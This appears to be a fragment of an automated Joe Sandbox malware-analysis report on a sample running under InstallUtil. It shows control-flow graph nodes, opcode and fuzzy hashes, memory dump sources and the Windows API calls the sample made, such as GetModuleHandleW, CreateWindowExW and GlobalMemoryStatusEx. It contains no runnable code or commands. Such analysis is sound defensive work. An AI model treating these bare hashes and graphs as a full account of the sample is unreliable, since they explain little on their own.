                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cdf3635cf2429b29e5d5ec2e492d9d83708364ede5b0db4099c5023051fdec08
                                                                                                            • Instruction ID: 6f5b53d87c26172b6e12292c442b1d9b6cf3ea1d0eb46930c38e2fda3e9fdd57
                                                                                                            • Opcode Fuzzy Hash: cdf3635cf2429b29e5d5ec2e492d9d83708364ede5b0db4099c5023051fdec08
                                                                                                            • Instruction Fuzzy Hash: D0412AB1D00229CFEBA8CF6AD5447EEBBF6AF88304F10D06AC419A7655D7B44584CF91
                                                                                                            Memory Dump Source

Execution Graph

Execution Coverage: 10.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 183
Total number of Limit Nodes: 20

Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 821f36fb5300b72ff702c4d9f2e2c3adc312497bbdca9eef0cad211d6cc57db8
                                                                                                            • Instruction ID: d1a7280c0cdf3ea2fc44f7611a9f21633fa4d97cf718527f77e235c79ee4db86
                                                                                                            • Opcode Fuzzy Hash: 821f36fb5300b72ff702c4d9f2e2c3adc312497bbdca9eef0cad211d6cc57db8
                                                                                                            • Instruction Fuzzy Hash: 2212E571F202169BDF68EB64D48066EB7B6EF85310F248439DC96EB385DA35DC41CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5d17fea785c492648b784b461a0685e7d500e6b293c89ffb204be5d22dd2edb8
                                                                                                            • Instruction ID: 0c74cf21a21709704af0f8b26d7d395753b92ad43b53afa7483281bb895d8cc2
                                                                                                            • Opcode Fuzzy Hash: 5d17fea785c492648b784b461a0685e7d500e6b293c89ffb204be5d22dd2edb8
                                                                                                            • Instruction Fuzzy Hash: 0902A230B212068FDB58EB68D8907AEB7F6FF85300F248569D9159B385DB35ED42CB80

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 515 623b318-623b327 516 623b353-623b357 515->516 517 623b329-623b336 call 623a2ac 515->517 519 623b36b-623b3ac 516->519 520 623b359-623b363 516->520 522 623b338-623b346 call 623b5a2 517->522 523 623b34c 517->523 526 623b3b9-623b3c7 519->526 527 623b3ae-623b3b6 519->527 520->519 522->523 533 623b488-623b548 522->533 523->516 528 623b3eb-623b3ed 526->528 529 623b3c9-623b3ce 526->529 527->526 534 623b3f0-623b3f7 528->534 531 623b3d0-623b3d7 call 623a2b8 529->531 532 623b3d9 529->532 536 623b3db-623b3e9 531->536 532->536 566 623b550-623b57b GetModuleHandleW 533->566 567 623b54a-623b54d 533->567 537 623b404-623b40b 534->537 538 623b3f9-623b401 534->538 536->534 540 623b418-623b421 call 6233934 537->540 541 623b40d-623b415 537->541 538->537 546 623b423-623b42b 540->546 547 623b42e-623b433 540->547 541->540 546->547 548 623b451-623b45e 547->548 549 623b435-623b43c 547->549 556 623b481-623b487 548->556 557 623b460-623b47e 548->557 549->548 551 623b43e-623b44e call 6238af8 call 623a2c8 549->551 551->548 557->556 568 623b584-623b598 566->568 569 623b57d-623b583 566->569 567->566 569->568
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 9f4eb95ea4dcf17829abc30a1d08e835c7276b2bec4f424f0fcbd85f94711268
                                                                                                            • Instruction ID: 7e882a191a2d4f64ff5c3f5bff1222b12160c1040618d8ae06bfa392edb73cc4
                                                                                                            • Opcode Fuzzy Hash: 9f4eb95ea4dcf17829abc30a1d08e835c7276b2bec4f424f0fcbd85f94711268
                                                                                                            • Instruction Fuzzy Hash: CF8179B0A10B158FDB64DF2AD45075ABBF1FF88301F008A2ED89AC7A50D775E845CB90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 676 cfe998-cfe9b3 678 cfe9dd-cfe9e0 676->678 679 cfe9b5-cfe9dc 676->679 680 cfe9e1-cfe9fc call cfe1f4 678->680 685 cfe9fe-cfea01 680->685 686 cfea02-cfea54 680->686 686->680 691 cfea56-cfea61 686->691 692 cfea67-cfeaf4 GlobalMemoryStatusEx 691->692 693 cfea63-cfea66 691->693 696 cfeafd-cfeb25 692->696 697 cfeaf6-cfeafc 692->697 697->696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3360659394.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_cf0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd8043197ddf51cae785da20469a9e53d4c80141a6c805037ac39076a3111fdd
                                                                                                            • Instruction ID: f0fb1fc1fe5cd4ef85ef22399a475c99f8042a7db2338842bbb9aef170506d6d
                                                                                                            • Opcode Fuzzy Hash: dd8043197ddf51cae785da20469a9e53d4c80141a6c805037ac39076a3111fdd
                                                                                                            • Instruction Fuzzy Hash: BA417672E083998FCB10CFB9D8106EEBFF0AF89310F18816BD544A7251D7789944CBA2

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 700 623d4e4-623d556 702 623d561-623d568 700->702 703 623d558-623d55e 700->703 704 623d573-623d5ab 702->704 705 623d56a-623d570 702->705 703->702 706 623d5b3-623d612 CreateWindowExW 704->706 705->704 707 623d614-623d61a 706->707 708 623d61b-623d653 706->708 707->708 712 623d660 708->712 713 623d655-623d658 708->713 714 623d661 712->714 713->712 714->714
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0623D602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 5633bb3c13bf9211f187e5e00942d7b6e4f0db536278fb1a683682e390aadb47
                                                                                                            • Instruction ID: 619fed06cff4707566a90abc3cc0866e91789cf4dfd94d867f05ab017c742cf3
                                                                                                            • Opcode Fuzzy Hash: 5633bb3c13bf9211f187e5e00942d7b6e4f0db536278fb1a683682e390aadb47
                                                                                                            • Instruction Fuzzy Hash: 0751D0B1D10359DFDB14CFA9D884ADEBFB5BF88310F24852AE819AB210D771A845CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 715 623d4f0-623d556 716 623d561-623d568 715->716 717 623d558-623d55e 715->717 718 623d573-623d612 CreateWindowExW 716->718 719 623d56a-623d570 716->719 717->716 721 623d614-623d61a 718->721 722 623d61b-623d653 718->722 719->718 721->722 726 623d660 722->726 727 623d655-623d658 722->727 728 623d661 726->728 727->726 728->728
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0623D602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: b9c58df80bb81d8429033519c35ac95777d9b4523f72c8c42e0f951e56df8aa4
                                                                                                            • Instruction ID: 57e61e4bf22212de69c3bf21f7d5ee971d1b0e1bc55d48b1fc11b1282ab98878
                                                                                                            • Opcode Fuzzy Hash: b9c58df80bb81d8429033519c35ac95777d9b4523f72c8c42e0f951e56df8aa4
                                                                                                            • Instruction Fuzzy Hash: 0B41C0B1D10359DFDB14CF99D884ADEBFB5BF88310F24852AE819AB210D774A845CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 729 623e46c-623fc6c 732 623fc72-623fc77 729->732 733 623fd1c-623fd3c call 623a48c 729->733 735 623fcca-623fd02 CallWindowProcW 732->735 736 623fc79-623fcb0 732->736 740 623fd3f-623fd4c 733->740 738 623fd04-623fd0a 735->738 739 623fd0b-623fd1a 735->739 743 623fcb2-623fcb8 736->743 744 623fcb9-623fcc8 736->744 738->739 739->740 743->744 744->740
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0623FCF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 1f4c1c868d0147f5d9601b15877a7b399319d1dd5f9be6aace9e5e44868b9e25
                                                                                                            • Instruction ID: 281f7c3fea5456b656537905b0e69aaa1938b00ba86edcba4fa62d5adf6d975c
                                                                                                            • Opcode Fuzzy Hash: 1f4c1c868d0147f5d9601b15877a7b399319d1dd5f9be6aace9e5e44868b9e25
                                                                                                            • Instruction Fuzzy Hash: 7F4158B4D10319CFDB54CF99D948AAABBF5FF88314F24C859D919AB321C374A841CBA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 746 6233048-62330e4 DuplicateHandle 747 62330e6-62330ec 746->747 748 62330ed-623310a 746->748 747->748
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062330D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 489af3279260d179d7e3f080221a94d75724d721b2e44b175e542fa04fba18ce
                                                                                                            • Instruction ID: 39ec09cee6b0ba8bc070cc8a3e70451a3dafd6ec4155c8361e2f30bbb3b186c1
                                                                                                            • Opcode Fuzzy Hash: 489af3279260d179d7e3f080221a94d75724d721b2e44b175e542fa04fba18ce
                                                                                                            • Instruction Fuzzy Hash: 9E2100B5D00259DFDB10CFAAD884AEEBBF4EB48310F14801AE918A3310D379A950CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 751 6233050-62330e4 DuplicateHandle 752 62330e6-62330ec 751->752 753 62330ed-623310a 751->753 752->753
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 062330D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: ab59cc70e64013ab97ae16704c023639fb2af655b18d5ac0f43600d09e0d5561
                                                                                                            • Instruction ID: e377823c5db3eafb1a18ae08b4d72f59decfe82f10cd14e9d2f156dd1ef53d8e
                                                                                                            • Opcode Fuzzy Hash: ab59cc70e64013ab97ae16704c023639fb2af655b18d5ac0f43600d09e0d5561
                                                                                                            • Instruction Fuzzy Hash: 3E21E4B5900259DFDB10CFAAD984ADEFFF8EB48310F14841AE914A3310C379A954CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 756 cfea80-cfeabe 757 cfeac6-cfeaf4 GlobalMemoryStatusEx 756->757 758 cfeafd-cfeb25 757->758 759 cfeaf6-cfeafc 757->759 759->758
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00CFEAE7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3360659394.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_cf0000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 0565c2e1fa18c7d7b2979fcb2b306b80ef280618f1810aefcb264dcd6f158074
                                                                                                            • Instruction ID: 4a8c21450ea399f385f23ef7dc07f0315e8c0e628c599d2c0e6f3ae6e19621ef
                                                                                                            • Opcode Fuzzy Hash: 0565c2e1fa18c7d7b2979fcb2b306b80ef280618f1810aefcb264dcd6f158074
                                                                                                            • Instruction Fuzzy Hash: 001112B1C0065ADBDB10CF9AC444BDEFBF4BF48320F15816AE918A7240D378A944CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 762 623a2ac-623b548 764 623b550-623b57b GetModuleHandleW 762->764 765 623b54a-623b54d 762->765 766 623b584-623b598 764->766 767 623b57d-623b583 764->767 765->764 767->766
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0623B334), ref: 0623B56E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3368934724.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6230000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bb6dfbdc42c0d9fff3a4c13c93ed60e60b11282c50042b636a7b49a968ff3c2
                                                                                                            • Instruction ID: 7c1c406c3e6a3d9ed0feb4332c5b22429980d312a32b6ee46bae19babf616482
                                                                                                            • Opcode Fuzzy Hash: 5bb6dfbdc42c0d9fff3a4c13c93ed60e60b11282c50042b636a7b49a968ff3c2
                                                                                                            • Instruction Fuzzy Hash: C0512F30B115568FDB99EB78D890BAF73F2BFC9240F148569D80ADB348EE309C418B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce2f4a482b142487cc2495afeb0af1adb085a2ab9fd38e5ef341e2a179b5b41f
                                                                                                            • Instruction ID: 55b4351627fd4859dbba0e294550d34f4874831b20baeaadbf8501fd1ffdd799
                                                                                                            • Opcode Fuzzy Hash: ce2f4a482b142487cc2495afeb0af1adb085a2ab9fd38e5ef341e2a179b5b41f
                                                                                                            • Instruction Fuzzy Hash: B851DE30B302158BFF58B66CD96472F766AD7CE310F204426E90AC77D5CA79CC814792
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 020e6da4dcecb89c1bbc15958a4844d5732a7eae4b80ccbccca2eccc74c26d3b
                                                                                                            • Instruction ID: 0b60f40e8ae12a12240914629fc63afde52a9930558e5927d79a5036bb98cfdf
                                                                                                            • Opcode Fuzzy Hash: 020e6da4dcecb89c1bbc15958a4844d5732a7eae4b80ccbccca2eccc74c26d3b
                                                                                                            • Instruction Fuzzy Hash: F2518E71F102199FDF54AFA5C8557AEBBF6FF88300F208529E506AB395DA758C018B80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1428ede75cfeb4bb80db0a046442369ff4d369407f305458f55f52143ea7980d
                                                                                                            • Instruction ID: ba3745177fc57e35c47fefd7f24f58982e635753d41c6371302935c2e92462cc
                                                                                                            • Opcode Fuzzy Hash: 1428ede75cfeb4bb80db0a046442369ff4d369407f305458f55f52143ea7980d
                                                                                                            • Instruction Fuzzy Hash: DF416A31E1060A8FDF74DFA9D880ABFF7B2EB85210F10492AE556E7600D330E955CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd0ecf4601f6d0eb924d016b59ea1ef6d42d660455f473fff9d0c1e771d34bac
                                                                                                            • Instruction ID: ef5868e97864334a6efea4bd6e375fb5709cf38208bc48379d2f8531c571cdbb
                                                                                                            • Opcode Fuzzy Hash: cd0ecf4601f6d0eb924d016b59ea1ef6d42d660455f473fff9d0c1e771d34bac
                                                                                                            • Instruction Fuzzy Hash: 57418170E2060ADFDB58EF65D8557AEBBB2BF85740F20492AE805DB280DB709945CB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d4c7256f168464f850921147e052bd1a4add82ef0d8013ea6a5b99797552a04
                                                                                                            • Instruction ID: 1021e71d3a4421abf45a236a0efba1963568828829bd1ffc5a4342b3d5068495
                                                                                                            • Opcode Fuzzy Hash: 9d4c7256f168464f850921147e052bd1a4add82ef0d8013ea6a5b99797552a04
                                                                                                            • Instruction Fuzzy Hash: 3A41B670E2060ADFDB59EF75D85179EBBB2BF85340F20492AE801DB240DB70D846CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a4034887a80d78b946dc1fc07b51a0425422a8569ea51942251322a155c96cdf
                                                                                                            • Instruction ID: 83c19e5df82b0c641c36367396393489a3a9ae3ad690d64c64b04d85e801839b
                                                                                                            • Opcode Fuzzy Hash: a4034887a80d78b946dc1fc07b51a0425422a8569ea51942251322a155c96cdf
                                                                                                            • Instruction Fuzzy Hash: 1231D531B21206CFDB99BB76D5507AE7BB2AF89200F20496DE802DB745DE35CE41CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 815ca76ae301f572031df819d251c317b948b408e19cb46374a0396646ff03a8
                                                                                                            • Instruction ID: 231ab158dd9d7f9c047908c4902f7f72c07105eedbd6b774047b82531c0c7e5d
                                                                                                            • Opcode Fuzzy Hash: 815ca76ae301f572031df819d251c317b948b408e19cb46374a0396646ff03a8
                                                                                                            • Instruction Fuzzy Hash: 0131CF31B21206CFDB58AB36D5547AF7BB6AF89600F204468E802DB385DE35CD41CBD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67ff66d0279ba5044379293e9c7df8627ab374d7987cb204bdfbe597c24df060
                                                                                                            • Instruction ID: 030cb6ed53c407be1796c82f7a7f589e91fbc6cc727bd3b3757ef5787674ab7e
                                                                                                            • Opcode Fuzzy Hash: 67ff66d0279ba5044379293e9c7df8627ab374d7987cb204bdfbe597c24df060
                                                                                                            • Instruction Fuzzy Hash: F431B071E2120ADBCB58DF65C894A9EB7B6FF88300F108929F80AE7350DB71AD41CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3062a2079896ebaa4826b443e79024f0d9944d4e180f3143d2d536803ee9a313
                                                                                                            • Instruction ID: b5962dbc0d2ee6e5b6ced27dd0af7125bc19a8831e790e1be6070dc8fa97f5cb
                                                                                                            • Opcode Fuzzy Hash: 3062a2079896ebaa4826b443e79024f0d9944d4e180f3143d2d536803ee9a313
                                                                                                            • Instruction Fuzzy Hash: F5318071E2060ADBDB19DF65D89469EB7B6BF89300F108919F806EB350DF71AD41CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7cdbfd90478c96fd0d4b3f324e27ae3da27df50e8e146d31d47319ef2bc0fa75
                                                                                                            • Instruction ID: a2a649db0167278deac1304beacff488c35a7648c7be9989cc264eb12edf3c66
                                                                                                            • Opcode Fuzzy Hash: 7cdbfd90478c96fd0d4b3f324e27ae3da27df50e8e146d31d47319ef2bc0fa75
                                                                                                            • Instruction Fuzzy Hash: 0D21AE75F216159FDB44EFA9E880BAEBBF5AB48710F148065E905E7381E730D8418FA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae933dbec17ef40ff5e434e68b40b103a756ee9e116495a0d03b89a4099d4eb0
                                                                                                            • Instruction ID: 86a1864aa6c3f41911b7641a27eaf5e2313e5ba12f8611ac62aa47c56bba829d
                                                                                                            • Opcode Fuzzy Hash: ae933dbec17ef40ff5e434e68b40b103a756ee9e116495a0d03b89a4099d4eb0
                                                                                                            • Instruction Fuzzy Hash: 48218031A207069FDB75DFA5D8C1ABFB7F2FB85200F104929D596AB550D330A845CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3369037122.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_6240000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a59647031c0ca7387168243ac89f443e6623980789b4b9442993da8d78049024
                                                                                                            • Instruction ID: f660f4e727efe95a4c60caa9d3a7515f11366059af8f3377635a58166eb280f6
                                                                                                            • Opcode Fuzzy Hash: a59647031c0ca7387168243ac89f443e6623980789b4b9442993da8d78049024
                                                                                                            • Instruction Fuzzy Hash: E721A175F216169FDB44EFAAD880AAEBBF1FB48710F148065E905E7390E730D8408F95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3359563717.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_a9d000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bcc2a8b64329aa6eefdc78703c28c65e0753cd40175ddf25fc16f6c5d9b99642
                                                                                                            • Instruction ID: 7b1a2e57e426ed3398e97476396b290b0941903e030517cf7e3917d95c396f62
                                                                                                            • Opcode Fuzzy Hash: bcc2a8b64329aa6eefdc78703c28c65e0753cd40175ddf25fc16f6c5d9b99642
                                                                                                            • Instruction Fuzzy Hash: 5F21C572604244EFDF05DF14D9C0B26BFA5FBD4724F24C56DE9090B256C336E896CAA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.3360437655.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_cad000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a71047a97c2063f8e94122718045277e7311cb2ef1ee574df5ebd5550ae6c8f
                                                                                                            • Instruction ID: ce08f5d9632e6220b88ab55354ae8ff365323e31f55ba6135192a2bd9a1951af
                                                                                                            • Opcode Fuzzy Hash: 9a71047a97c2063f8e94122718045277e7311cb2ef1ee574df5ebd5550ae6c8f
                                                                                                            • Instruction Fuzzy Hash: 4C213471604305EFCB10DF14D9C0B26BBA1FB85318F20C56DD90B0B682C33AD847CA62
                                                                                                            Memory Dump Source

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:14
                                                                                                            Total number of Limit Nodes:3
